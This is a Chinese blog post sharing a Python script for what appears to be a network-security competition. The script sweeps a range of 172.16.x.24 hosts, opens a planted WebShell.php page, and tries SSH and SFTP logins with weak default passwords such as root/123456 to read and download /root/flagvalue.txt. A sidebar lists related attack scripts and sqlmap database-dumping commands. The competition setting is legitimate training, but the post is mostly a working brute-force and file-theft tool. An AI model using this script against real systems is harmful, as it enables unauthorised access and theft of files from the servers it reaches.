自动获取flag

最新推荐文章于 2024-04-28 20:33:33 发布
最新推荐文章于 2024-04-28 20:33:33 发布
阅读量1k 收藏 2
点赞数
文章标签: Python 安全 大赛 flag 扫描
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zheng_ruiguo/article/details/89467122
版权 
'''
scanFlag.py 自动获取flag by 郑瑞国
'''
import paramiko
import webbrowser
import threading
import time

def webConnect(ip):
    webbrowser.open('http://'+ip+'/html/WebShell.php')
    time.sleep(0.5)

def ftpConnect(ip,user,pwd):
    try:
        transport = paramiko.Transport((ip, 22))
        transport.connect(username=user,password=pwd)
        sftp = paramiko.SFTPClient.from_transport(transport)
        # 将remove_path 下载到本地 local_path
        sftp.get('/root/flagvalue.txt', 'flagvalue'+ip+'.txt')
        print(ip,'ftp get flag OK',user)
        transport.close()
        return 1
    except:
        print(ip,'ftp no connect',user)

def sshConnect(ip,user,pwd):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(hostname=ip,port=22,username=user,password=pwd,timeout=1)
        flag = ssh.exec_command('cat /root/flagvalue.txt')[1].readlines()
        print(ip,'flag:')
        for line in flag:
            print(line)
        ssh.close()
        return 1
    except:
        print(ip,'ssh no connect',user)


def scanAll(firstNet,endNet,user1,pass1,user2,pass2):
    for net in range(firstNet,endNet):
        ip = '172.16.'+str(net)+'.24'
        #print(ip)
        threading._start_new_thread(webConnect,(ip,))
        time.sleep(0.5)
        threading._start_new_thread(sshConnect,(ip,user1,pass1))
        time.sleep(0.5)
        threading._start_new_thread(ftpConnect,(ip,user1,pass1))
        time.sleep(0.5)
        threading._start_new_thread(sshConnect,(ip,user2,pass2))
        time.sleep(0.5)
        threading._start_new_thread(ftpConnect,(ip,user2,pass2))
        time.sleep(0.5)

if __name__=='__main__':
    ##scanAll(firstNet,endNet,user1,pass1,user2,pass2)
    scanAll(101,109,'admin','123456','root','123456')

 

云空
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AWD攻防中读取flag的批量脚本
09-05
AWD攻防中读取flag的批量脚本,可能需要自行修改下
『CTF Web复现』BUUCTF-[NCTF2019]phar matches everything(自动化脚本获取flag
Ho1aAs‘s Blog
09-07 1405
特点:自动化python脚本获取flag;利用点:unserialize反序列化;phar反序列化;添加图片头和更改MIME、后缀绕过文件上传检测;ssrf gopher协议打php-fpm;绕过open_basedir
ctfshow web78 获取flag(用老版的火狐浏览器)
最新发布
XiaoYeZhu_1314的博客
04-28 347
第一种:利用input伪协议 ,获取flag。第二种:利用flter协议,获取flag。第三种:利用data 协议 获取到fag。
全国职业技能大赛信息安全管理与评估-第三阶段-弱口令自动爆破+读取Flag脚本...
weixin_30707875的博客
06-08 1521
自动爆破SSH弱口令+读取Flag #coding=utf-8 import paramiko sshc = paramiko.SSHClient() sshc.set_missing_host_key_policy(paramiko.AutoAddPolicy()) host = "172.16.1." for i in range(120,131): ...
AWD自动提交flag脚本
05-14
AWD自动提交flag脚本
记一次Flag获取
chenweicheer的博客
05-04 4323
题目链接http://ctf5.shiyanbar.com/qwctf/flag-checker.html        这是实验吧的一个题目很简单打开链接弹出一个input框输入正确的值就是flag,验证也很简单首先是输入长度必须是47后面全部是一些方程。通过解这个题目我巩固了栈,求逆波兰表达式,和逆波兰表达式求值。基础很重要决定记录下来。        思路:将判断表达式提取出来用&&来分割
自动提交flag到指定服务器python脚本
05-12
自动从txt读取flag并提交指定平台python脚本,AWD比赛专用,可以自定义内容,批量提交等,确保速度
awd比赛可用的自动获取flag脚本。.zip
09-30
awd比赛可用的自动获取flag脚本。
网络安全竞赛C模块批量拿值脚本
旺仔Sec&blog
07-21 1466
CTF-夺旗批量get靶机flag
文件包含批量攻击脚本
09-07
基础的文件包含,可以通过该脚本直接获取相应的flag,在awd中好用
AWD批量拿分python脚本
05-12
根据网上版本修改的,现场更好更改参数的版本,减少AWD比赛时的代码修改量,原始版本是网上公有版本,个人觉得哪个版需要改的参数太多浪费了很多比赛时间,可以提前根据自己shell名称改好速度会更快
对510cms进行渗透测试,找到其中的3个flag
Alashan12的博客
04-08 4444
拿到网站 简单观察后发现url区域存在传参 简单测试找到存在注入的界面(此网站多处网址存在注入) 这里我们通过输入一个单引号找到“企业介绍”—>“企业文化”界面存在注入 我们针对此界面(180.76.226.182/about.php?listid=6)使用sqlmap进行爆破 sqlmap -u 180.76.226.182/about.php?listid=6 --current-db 爆当前数据库名 得到数据库名为“510cms” 然后指定该数据库...
渗透实战-vulnhub-DC-3
qq_52263650的博客
04-07 301
渗透实战-vulnhub-DC-2
GIF格式不依靠特定工具找出flag
cadandme的博客
02-27 1279
GIF格式不依靠特定工具找出flag 内容:今天做了道web题,跟大家分享一下解题方法。 打开后是一个gif,然后我就尝试用各种方式去看gif的内容,在用记事本打开后看到一大堆乱码的最后有这么一串字符串 #我发现跟asc解加密有关,但asc解加密还需要一个密码,而在gif显示出来有几个字母,符合密码条件。从而找出flag。 主要: 在这里主要分享:在不用特定软件的情况如何在一个gif里面找出我们需要的画面,我们可以打开gif然后右击,选择编辑并创建里面的视频制作。 进入后的画面如下,我们可以很轻松的找到
Dest0g3 520迎新赛 writeup by 树木
JEWSWS的博客
05-29 3564
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
wirehark数据分析与取证flag.pcap
热门推荐
Aluxian_的博客
04-18 1万+
什么是wireshark?wiresharekflag.pcap数据包数据包下载 请私信博主 wiresharek Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包,并同时显示出最详细的网络封包数据。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。 wireshark的介绍: 假设您是一名网络安全工程师,需要对某公司的公司进行数据分析,分析黑客获取电脑权限进行的操作,我们本章主要以分析案例数据包进行分析关键数据。 flag.p
wireshark流量分析网络安全
夜思红尘的博客
04-18 3240
这是关于一篇wireshark分析数据包的文章,主要是网络安全里的应用,讲述了wireshark的使用方法,主要使用的事wrieshark里的追踪流,欢迎大家学习借鉴!
sqlmap详解及实战拿flag
weixin_43996007的博客
12-19 4515
sqlmap详解及实战拿flag 一、sqlmap介绍 sqlmap是一个非常强大的自动化SQL注入工具,其主要功能是扫描,发现并利用SQL注入漏洞。sqlmap工具支持多种sql注入技术,它们分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报...
sqlmap找flag
12-21
sqlmap是一个强大的自动化SQL注入工具,可以用于扫描、发现并利用SQL注入漏洞。如果你想使用sqlmap来找到flag,你可以按照以下步骤进行操作: 1. 首先,你需要获取目标网站的URL,例如:http://192.168.129.129:8079/?id=1。 2. 然后,你可以使用sqlmap的命令行参数来指定目标URL和其他必要的参数。例如,你可以使用以下命令来扫描并发现数据库和表的信息: ```shell python sqlmap.py -u "http://192.168.129.129:8079/?id=1" --dbs --tables ``` 这将输出数据库和表的信息,你可以从中找到包含flag的表。 3. 接下来,你可以使用以下命令来获取表的列信息: ```shell python sqlmap.py -u "http://192.168.129.129:8079/?id=1" -D <database> -T <table> --columns ``` 将`<database>`替换为目标数据库的名称,将`<table>`替换为目标表的名称。这将输出表的列信息,你可以从中找到包含flag的列。 4. 最后,你可以使用以下命令来获取表中的数据,并找到flag: ```shell python sqlmap.py -u "http://192.168.129.129:8079/?id=1" -D <database> -T <table> -C <column> --dump ``` 将`<database>`替换为目标数据库的名称,将`<table>`替换为目标表的名称,将`<column>`替换为包含flag的列的名称。这将输出表中的数据,你可以从中找到flag。 请注意,使用sqlmap进行SQL注入测试可能涉及到非法活动,应该仅在合法授权的情况下使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值